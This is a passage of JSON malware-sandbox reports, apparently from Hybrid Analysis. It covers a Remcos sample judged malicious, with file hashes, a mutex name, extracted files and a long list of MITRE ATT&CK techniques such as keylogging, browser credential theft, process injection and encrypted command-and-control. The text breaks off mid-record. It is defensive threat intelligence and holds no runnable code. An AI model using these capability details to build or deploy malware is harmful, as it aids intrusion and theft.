linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (99 files)"], "total_file_compositions_imports": 321}, "mitre_attcks": [{"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"a16e4186a3a69f7ec7544083d4c6bbb67eae8d0fe40662d398bb50f5d571372e\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"a16e4186a3a69f7ec7544083d4c6bbb67eae8d0fe40662d398bb50f5d571372e\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"a16e4186a3a69f7ec7544083d4c6bbb67eae8d0fe40662d398bb50f5d571372e\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"a16e4186a3a69f7ec7544083d4c6bbb67eae8d0fe40662d398bb50f5d571372e\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"a16e4186a3a69f7ec7544083d4c6bbb67eae8d0fe40662d398bb50f5d571372e\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"a16e4186a3a69f7ec7544083d4c6bbb67eae8d0fe40662d398bb50f5d571372e\" has section name .text with entropy \"6.38602896171\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "avtest-9", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively low confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/grayware_confidence_70% (D)", "origin": "External System"}]}
0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0
https://hybrid-analysis.com/sample/0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0
Hybrid Analysis - Remcos
{"size": 480768, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0", "sha256": "0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0", "av_detect": 89, "vx_family": "Dacic.A9349469.A.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 1, "total_signatures": 181, "extracted_files": [{"name": "dism.log", "file_size": 279799, "sha256": "aa703a145e0f7089101b3960eb6dffbaa0bb6ad42ed3784f22e2b58192e4a90d", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "runtime_process": "0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe (PID: 5948)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67A9C5A4.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe (PID: 5948)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24245)", "97 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24245)"], "imported_objects": ["23 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "34 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "58 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24237)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (97 files)"], "total_file_compositions_imports": 300}, "processes": [{"uid": "00000000-00005948", "name": "0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe", "normalized_path": "C:\\0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe", "sha256": "0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 16}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over Web Service", "attck_id": "T1567", "attck_id_wiki": "https://attack.mitre.org/techniques/T1567", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Rmc-GQZAWL\"\n \"Rmc-GQZAWL\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67A9C5A4.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0\" file has an entrypoint instructions - 